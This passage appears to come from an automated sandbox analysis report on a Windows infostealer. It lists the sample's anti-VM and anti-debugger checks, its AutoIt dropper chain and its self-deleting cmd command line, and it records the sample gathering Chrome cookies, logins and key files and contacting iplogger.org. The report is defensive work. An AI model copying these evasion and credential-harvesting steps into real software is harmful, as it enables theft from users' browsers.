Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 31 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 46 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 39 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 46 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 46 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 32 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 37 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe TID: 4000	Thread sleep count: 46 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344	Thread sleep count: 40 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344	Thread sleep time: -160000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344	Thread sleep count: 43 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 3344	Thread sleep count: 43 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe TID: 1480	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Is looking for software installed on the system

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	File opened: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: IntelRapid.exe, 0000001D.00000002.365761146.000001E574EA8000.00000004.00000020.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: Bisogna.exe.com, 00000018.00000002.584887788.0000000003828000.00000004.00000001.sdmp	Binary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW.48.ID
Source: IntelRapid.exe, 0000001A.00000002.339502137.000001B5F8B47000.00000004.00000020.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__m
Source: Bisogna.exe.com, 00000015.00000003.343298124.0000000001913000.00000004.00000001.sdmp	Binary or memory string: l $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: Bisogna.exe.com, 00000015.00000002.356329862.000000000452E000.00000004.00000001.sdmp	Binary or memory string: YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW
Source: Bisogna.exe.com, 00000015.00000003.346272795.00000000018F8000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580386952.0000000000BB0000.00000004.00000020.sdmp, l.19.dr	Binary or memory string: Local $dpjdrFdkImGxcUs = 'YdaYbFcioTgAbLsKDnotAusWNAHgFsSMbOFrJAYKOtipdPOWoW'
Source: Bisogna.exe.com, 00000018.00000002.586020257.00000000039DE000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: l.19.dr	Binary or memory string: Local $MatUeAuy = 'cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'
Source: Bisogna.exe.com, 00000018.00000002.584960509.000000000384E000.00000004.00000001.sdmp	Binary or memory string: cAzzkNstNnkSxxPNWsojsTCsmnprylnNzZxtRABkbHKNikaYgiupYThCYwUNEgZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN
Source: Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW (
Source: Bisogna.exe.com, 00000015.00000002.355832270.000000000191C000.00000004.00000001.sdmp	Binary or memory string: gZCZbmxqKVvQWOJoOlhulOYtfOALRuPGOHpIoOKMYYEkJzetEzpRGHzmwbKIYIoEyQwgFqqqABijlMcVMcinWYZihJHKrwNfQZuTsNmDapstmifgeOWCBJHiQUqWzdWnNSvlGBEYWDuMHUIuzaHfykNuaZevN'

Contains functionality to query system information

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040E340

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_004026C0 Sleep,FindFirstFileW,FindNextFileW,FindClose,		0_2_004026C0
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0042B3BE FindFirstFileExW,		0_2_0042B3BE
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_00406301 FindFirstFileW,FindClose,		10_2_00406301
Source: C:\Users\user\AppData\Local\Temp\File.exe	Code function: 10_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		10_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E23D4 FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		13_2_004E23D4

Queries a list of all running drivers

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Thread information set: HideFromDebugger

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\File.exe

Code function: 10_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

10_2_00406328

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0042B021 mov eax, dword ptr fs:[00000030h]		0_2_0042B021
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_004238B1 mov eax, dword ptr fs:[00000030h]		0_2_004238B1
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0308092B mov eax, dword ptr fs:[00000030h]		0_2_0308092B
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_030AB271 mov eax, dword ptr fs:[00000030h]		0_2_030AB271

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugObjectHandle			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00417261

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0042C86D GetProcessHeap,

0_2_0042C86D

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_00417261 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00417261
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_004173F7 SetUnhandledExceptionFilter,		0_2_004173F7
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0041763D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_0041763D
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Code function: 0_2_0041D9DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0041D9DD
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E6ECF SetUnhandledExceptionFilter,		13_2_004E6ECF
Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe	Code function: 13_2_004E6B2F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		13_2_004E6B2F

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Domain query: iplogger.org
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 88.99.66.31 187

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: C:\Users\user\AppData\Local\Temp\File.exe 'C:\Users\user~1\AppData\Local\Temp\File.exe'			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 4			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com Bisogna.exe.com l			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'			Jump to behavior

Contains functionality to create a new security descriptor

Source: C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe

Code function: 13_2_004E1808 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

13_2_004E1808

May try to detect the Windows Explorer process (often used for injection)

Source: Bel.wav.13.dr	Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: IntelRapid.exe, 00000016.00000002.773608580.0000023268CE0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040E340

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_cookies.db VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_key.bin VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_logins.db VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_webdata.db VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Information.txt VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Screen_Desktop.jpeg VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\screenshot.jpg VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\system_info.txt VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_cookies.db VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_key.bin VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_logins.db VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_webdata.db VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_00417091 cpuid

0_2_00417091

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\7yyqdBJVGf.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Contains functionality to query local / system time

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_00414240 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00414240

Contains functionality to query time zone information

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0042A574 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_0042A574

Contains functionality to query the account / user name

Source: C:\Users\user\Desktop\7yyqdBJVGf.exe

Code function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040E340

Contains functionality to query windows version

Source: C:\Users\user\AppData\Local\Temp\File.exe

